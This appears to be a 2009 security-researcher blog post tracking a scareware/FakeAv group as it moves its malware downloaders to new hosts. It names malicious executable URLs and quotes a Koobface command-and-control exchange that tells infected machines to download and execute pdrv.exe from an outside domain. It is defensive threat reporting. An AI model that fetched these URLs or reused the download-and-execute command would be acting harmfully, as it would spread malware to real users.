Softwarefortubeview Moves to a New Home at

We posted a couple of weeks ago on the continued success of a group in distributing FakeAv/Rogueware/Scareware.

Please note that their downloaders have been moved to a new home at There are multiple domains currently resolving to that ip managed by “Sago Networks”. One we know of currently serving softwarefortubeview.40019.exe executables is wile-exe.com. The move appears to have happened on June 1st. Avoid executables from that domain for now.

The downloads appear to be committing some sort of click fraud, although they have been known to pop fake alerts to move FakeAv software, see here, here and here.

Update (2009.06.09) — we are following the downloaders, and the group moved to another couple of ip’s yesterday (2009.06.08), this time and For example, you can find the malware at my-exe-profile. com/softwarefortubeview.45084.exe. The server virtually hosts an array of content, include “Download Now!” links that redirect to paid mp3 services, fetish videos, and more malware.
Also related is my-exe-profile. com/ av-scanner.48047.exe. However, this dropper/downloader lays out a couple of Clickfraud trojans, visiting a long list of banner ads and ad sites from the compromised host. A Vundo variant is installed. An unusually packed Koobface variant is dropped on the machine. Another iehelper.dll Bho component pops a screenful of AntiVirus System PRO, or SWP2009Pro, and a dialog “There are serious threats detected on your computer” and another bogus “Windows Security Alert” reporting “Windows reports that your computer is infected”.

The final, and fairly new piece, is that it downloads pdrv.exe from evidek.ro. The “download and exec” command for this executable is sent down from a Koobface related channel, while more bogus alerts are popping on the system:

Partially mangled Koobface post and response are listed here:

POST /ld/gen.php
Host: upr15may.com

STARTONCE|hxxp://evidek. ro/1/pdrv.exe

This dropper creates
for which there is virtually no AV detection at this time. As always, don’t forget your behavioral-based protection.

The podmena.sys driver is interesting — it attaches to the tcpip device driver and appears to intercept network traffic coming and going from the system.

This entry was posted in The Law. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *


You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>